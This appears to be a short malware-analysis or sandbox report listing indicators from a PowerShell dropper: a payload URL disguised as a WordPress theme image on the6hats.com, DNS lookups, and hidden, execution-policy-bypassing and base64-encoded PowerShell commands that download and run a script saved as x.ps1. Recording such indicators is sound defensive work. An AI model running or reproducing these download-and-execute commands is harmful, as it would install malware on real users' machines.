Technical Information
- https://the6hats.com/wp-content/themes/enfold/images/allghcw6cf3myvskurb.jpg as %windir%\tasks\x.ps1
- 'th###ats.com':443
- 'microsoft.com':80
- DNS ASK th###ats.com
- DNS ASK microsoft.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden powershell -command { IEX(New-Object Net.WebClient).DownloadFile('https://the6hats.com/wp-content/themes/enfold/images/AllGHCw6cF3MYVSkUrB.jpg', '%WI...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -encodedCommand IABJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHQAaABlADYAaABhAHQAcwAuAGMAbwBtAC8Ad...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command %WINDIR%\Tasks\x.ps1